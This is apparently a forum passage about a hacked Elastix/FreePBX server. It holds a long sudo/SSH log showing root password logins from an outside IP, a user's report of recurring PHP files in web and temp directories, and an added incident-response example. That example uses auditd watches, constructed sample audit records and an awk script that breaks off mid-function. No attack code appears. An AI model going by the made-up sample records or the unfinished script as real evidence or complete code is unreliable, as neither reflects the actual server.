                      Jun 9 05:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 05:55:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 06:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 06:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 06:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 06:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 06:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 06:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 06:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 06:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 06:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 06:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 06:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 06:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 07:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 07:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 07:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 07:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 07:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 07:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 07:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 07:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 07:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 07:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 07:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 07:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 08:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 08:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 08:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 08:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 08:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 08:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 08:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 08:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 08:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 08:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 08:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 08:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:17:51 voicesrv01 sshd[15163]: Accepted password for root from 98.242.248.14 port 58874 ssh2
                      Jun 9 09:17:51 voicesrv01 sshd[15163]: pam_unix(sshd:session): session opened for user root by (uid=0)
                      Jun 9 09:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:20:02 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPASTERISKWEBGROUP asterisk
                      Jun 9 09:20:02 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPASTERISKWEBUSER asterisk
                      Jun 9 09:20:02 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPASTERISKGROUP asterisk
                      Jun 9 09:20:03 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPASTERISKUSER asterisk
                      Jun 9 09:20:03 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPDEVGROUP asterisk
                      Jun 9 09:20:03 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPDEVUSER asterisk
                      Jun 9 09:20:03 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting ASTMANAGERHOST localhost
                      Jun 9 09:20:05 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/retrieve_conf --run-install --skip-registry-checks
                      Jun 9 09:23:59 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:23:59 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table httpd
                      Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table asterisk
                      Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table sshd
                      Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table vsftpd
                      Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --dumpiptables
                      Jun 9 09:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 10:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 10:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 10:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 10:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 10:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 10:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 10:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 10:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 10:40:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 10:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 10:50:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 10:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 11:00:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 11:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 11:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 11:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 11:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 11:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 11:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 11:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 11:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 11:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 11:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 11:55:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 12:00:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 12:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 12:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 12:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 12:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 12:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 12:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 12:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 12:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 12:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 12:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 12:55:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 13:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 13:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 13:08:18 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table httpd
                      Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table asterisk
                      Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table sshd
                      Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table vsftpd
                      Jun 9 13:08:20 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --dumpiptables
                      Jun 9 16:51:21 voicesrv01 sshd[15163]: pam_unix(sshd:session): session closed for user root
                      Jun 9 20:14:09 voicesrv01 sshd[30173]: Accepted password for root from 98.242.248.14 port 52790 ssh2
                      Jun 9 20:14:09 voicesrv01 sshd[30173]: pam_unix(sshd:session): session opened for user root by (uid=0)
                      Jun 9 23:15:36 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper hdmodelreport
                      Jun 10 04:02:01 voicesrv01 runuser: pam_unix(runuser-l:session): session opened for user cyrus by (uid=0)
                      Jun 10 04:02:01 voicesrv01 runuser: pam_unix(runuser-l:session): session closed for user cyrus
                      Jun 10 07:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 07:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 07:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 07:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 07:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 07:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 07:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 07:40:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 07:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 07:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 07:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 08:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 08:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 08:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 08:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 08:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 08:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 08:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 08:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 08:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 08:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 08:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 08:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 09:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 09:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 09:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 09:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 09:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 09:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 09:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 09:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 09:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 09:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 09:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 09:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 10:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 10:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 10:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 10:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 10:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 10:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 10:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 10:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 10:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 10:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 10:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 10:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 11:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 10 11:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus

                        striderec

                        I did a recursive search for that file and it is only found on /tmp and /var/www/html/_asterisk

                        I delete them over and over but they come back...

                        I see strange POST commands on the access and ssl_access logs which I have already shared with you..

                        Now try to find a script writing to those directories
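
One way to follow this suggestion, as an added example that is not part of the original thread: put audit watches on the two directories and attribute each dropped .php file to the process that wrote it. The key name `php_drop`, the function names and the sample audit records are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the thread). Watch rules, run as root with auditd active:
#   auditctl -w /tmp -p wa -k php_drop
#   auditctl -w /var/www/html/_asterisk -p wa -k php_drop
# After the files reappear:  ausearch -k php_drop --raw | summarize_drops

# Constructed sample of raw audit records (pids, uids, inodes are made up).
sample_audit_log() {
    cat <<'EOF'
type=SYSCALL msg=audit(1497081301.512:901): arch=c000003e syscall=2 success=yes exit=9 ppid=2210 pid=4312 auid=4294967295 uid=100 gid=101 comm="httpd" exe="/usr/sbin/httpd" key="php_drop"
type=PATH msg=audit(1497081301.512:901): item=1 name="/var/www/html/_asterisk/magnito.php" inode=393301
type=SYSCALL msg=audit(1497081302.118:902): arch=c000003e syscall=2 success=yes exit=9 ppid=2210 pid=4312 auid=4294967295 uid=100 gid=101 comm="httpd" exe="/usr/sbin/httpd" key="php_drop"
type=PATH msg=audit(1497081302.118:902): item=1 name="/tmp/magnito23.php" inode=1310731
type=SYSCALL msg=audit(1497081360.004:903): arch=c000003e syscall=2 success=yes exit=9 ppid=2210 pid=4399 auid=4294967295 uid=100 gid=101 comm="httpd" exe="/usr/sbin/httpd" key="php_drop"
type=PATH msg=audit(1497081360.004:903): item=1 name="/tmp/sess_constructed" inode=1310740
EOF
}

# Read raw audit records on stdin; print "path exe pid=N uid=N" for every
# .php file written, joining SYSCALL and PATH records on the event id.
summarize_drops() {
    awk '
    function field(key,    i, v) {          # value of key=... in this record
        for (i = 1; i <= NF; i++)
            if (index($i, key "=") == 1) {
                v = substr($i, length(key) + 2); gsub(/"/, "", v); return v
            }
        return ""
    }
    {                                        # event id = "timestamp:serial"
        if (!match($0, /audit\([0-9.]+:[0-9]+\)/)) next
        id = substr($0, RSTART + 6, RLENGTH - 7)
    }
    /^type=SYSCALL/ { exe[id] = field("exe"); pid[id] = field("pid"); uid[id] = field("uid") }
    /^type=PATH/ {
        name = field("name")
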